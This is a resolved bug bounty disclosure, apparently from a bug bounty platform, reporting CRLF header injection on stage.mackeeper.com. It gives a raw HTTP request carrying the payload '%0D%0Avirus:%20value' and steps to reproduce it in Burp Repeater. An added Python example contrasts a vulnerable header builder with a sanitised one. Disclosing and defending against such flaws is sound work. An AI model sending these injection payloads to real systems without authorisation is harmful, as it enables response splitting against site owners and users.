CRLF Injection - http://stage.mackeeper.com/
Team Summary
Official summary from Clario
### Summary:

CRLF Injection - http://stage.mackeeper.com/

CRLF injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Vulnerable URL: http://stage.mackeeper.com/

### Steps To Reproduce:

1. In the rawRequest we have added '%0D%0Avirus:%20value'
2. In Burp Repeater copy and paste the below rawRequest
3. Notice the response with header added

------rawRequest----------

```
GET /%0D%0Avirus:%20value HTTP/1.1
Connection: keep-alive
Accept: /
Accept-Encoding: gzip,deflate
Host: stage.mackeeper.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
```

------rawRequest----------
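The following is an added example, not part of the original report or of the vendor's code. It shows the unsafe pattern the summary describes next to a hardened form, assuming the request path is reflected into a `Location` redirect header; the report does not say which header was affected, and `example.test` and all function names are hypothetical.

```python
from urllib.parse import quote, unquote

BASE = "https://example.test"  # constructed placeholder origin (assumption)


def redirect_unsafe(raw_path: str) -> str:
    """Vulnerable pattern: the decoded path is copied straight into a header."""
    location = BASE + unquote(raw_path)
    return f"HTTP/1.1 301 Moved Permanently\r\nLocation: {location}\r\n\r\n"


def redirect_safe(raw_path: str) -> str:
    """Reject control characters after decoding, then re-encode the value."""
    decoded = unquote(raw_path)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        raise ValueError("control character in header value")
    location = BASE + quote(decoded, safe="/")
    return f"HTTP/1.1 301 Moved Permanently\r\nLocation: {location}\r\n\r\n"


def header_names(response: str) -> list[str]:
    """Return the header field names a client would parse from the response."""
    head = response.split("\r\n\r\n", 1)[0]
    return [line.split(":", 1)[0] for line in head.split("\r\n")[1:] if ":" in line]


REPORTED_PATH = "/%0D%0Avirus:%20value"  # request path taken from the report

if __name__ == "__main__":
    # The unsafe builder emits a second header controlled by the request path.
    print(header_names(redirect_unsafe(REPORTED_PATH)))
    try:
        redirect_safe(REPORTED_PATH)
    except ValueError as exc:
        print("rejected:", exc)
    # A benign path with a space is re-encoded and yields a single header.
    print(redirect_safe("/docs/user guide"))
```

The check runs after percent-decoding, so it sees the same bytes the header writer would emit.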
Report Details
Additional information and metadata
State: Closed
Substate: Resolved
Bounty: $50.00
Submitted:
Weakness: CRLF Injection